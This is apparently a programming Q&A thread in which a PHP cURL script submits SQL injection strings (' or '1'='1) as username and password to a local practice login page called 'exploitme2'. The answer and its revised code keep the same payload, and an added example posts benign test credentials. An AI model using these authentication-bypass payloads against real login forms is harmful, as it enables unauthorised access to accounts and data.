
I am trying to:

  1. access $url
  2. insert the (2) values of the two indices into the corresponding input fields (username, password), then submit
  3. finally, grab the response from inputting and submitting in #2 and output the response.

I have the following code:

<?php
# get url to form (this is also assumed to be the form's action url; if the
# form posts somewhere else, post to that action url instead)
$url = "http://localhost/exploitme2/index.php?page=login.php";
$ch = curl_init($url); # initialize a cURL handle for that url

# the fields to post; the keys are the form's input names, not $_POST[...] keys
$params = array(
    "username" => "'' or '1'='1'",
    "password" => "'' or '1'='1'",
);

curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);  # set the POST fields
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); # return the response instead of printing it
$result = curl_exec($ch);

## echo the result from cURL'ing
echo $result;

curl_close($ch);
?>

I get this error:

syntax error, unexpected '=', expecting ')'

on this line:

$params = array($_POST['username']=>'' or '1'='1', 
                $_POST['password']=>'' or '1'='1');
  • Are you trying to create a script to brute force a login form? The word exploitme2 sets off a red flag for me =o\ Commented Dec 27, 2012 at 4:08
  • Eventually, in a white-hat sense. Commented Dec 27, 2012 at 4:09

1 Answer

In technical terms, this is all just a 1-step operation and not 3. You have already completed all those 3 steps. When you post those values to the above url, your result will be stored in your $result variable as per your code; you just need to return / display it. For cURL it is not like you have to visit a url first and then submit next; if you know the field names and the action url, then you can do all those 3 things in 1 step, like you have already done.

Try an echo for this variable:

$result = curl_exec($ch);
echo $result;   # this line displays the response
curl_close($ch);

OK, let me clarify some confusions here:

1) You don't have to specify the variables in the $_POST array. Your cURL POST variables can be anything. They don't have to be in $_POST.

2) You have to post the data to the form's action url and not its own url (unless of course both are the same).

So for 1 your code should be like:

$params = array("username" => "'' or '1'='1'", "password" => "'' or '1'='1'");  # keys are the form's field names

3 Comments

Mind showing a code sample here? I appreciate the understanding you've provided so far.
Please see my updated answer. My array values for $_POST['username'] and $_POST['password'] won't work because the actual value I'm trying to input is *** ' or '1'='1 *** but the single quotes are throwing it off. How can I do this?
Please see updated code; it now will not load the page at all, stating: "The connection was reset"
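The one-request flow the answer describes (named fields posted to the form's action URL, response captured and displayed), with the transport-level failure from the last comment ("The connection was reset") surfaced as a cURL error instead of a blank page. This is an added PHP example, not code from the question or the answer; the action URL, the field names and the test values are assumptions.

```php
<?php
// Added example (not from the original question or answer): submit named form
// fields to a login form's action URL in one cURL request and return the result.
// The URL, field names and values below are assumptions for illustration.

/**
 * POST $fields to $action_url; return HTTP status, body and any transport error.
 */
function post_form(string $action_url, array $fields, int $timeout = 10): array
{
    $ch = curl_init($action_url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        // http_build_query() sends application/x-www-form-urlencoded, the same
        // encoding a browser form uses; passing the array directly sends multipart.
        CURLOPT_POSTFIELDS     => http_build_query($fields),
        CURLOPT_RETURNTRANSFER => true,  // hand the body back instead of echoing it
        CURLOPT_FOLLOWLOCATION => false, // keep the login response itself, not a redirect target
        CURLOPT_CONNECTTIMEOUT => $timeout,
        CURLOPT_TIMEOUT        => $timeout,
    ]);

    $body  = curl_exec($ch);
    $errno = curl_errno($ch);  // non-zero for "connection was reset", refused, timeout, ...
    $error = curl_error($ch);
    $code  = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    return [
        'ok'     => $errno === 0,
        'error'  => $errno === 0 ? null : "cURL error $errno: $error",
        'status' => $code,
        'body'   => $body === false ? '' : $body,
    ];
}

// Keys are the form's <input name="..."> attributes, not $_POST[...] keys.
// Assumed action URL (the one the form posts to) and constructed test credentials.
$resp = post_form('http://localhost/exploitme2/index.php?page=login.php', [
    'username' => 'testuser',
    'password' => 'testpass',
]);

if (!$resp['ok']) {
    fwrite(STDERR, $resp['error'] . PHP_EOL); // e.g. the reset seen in the comments
    exit(1);
}
printf("HTTP %d, %d bytes of response%s", $resp['status'], strlen($resp['body']), PHP_EOL);
echo $resp['body'];
```

Checking `curl_errno()` separates a server that answered (any HTTP status) from a connection that never completed, which a bare `echo $result;` cannot tell apart.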
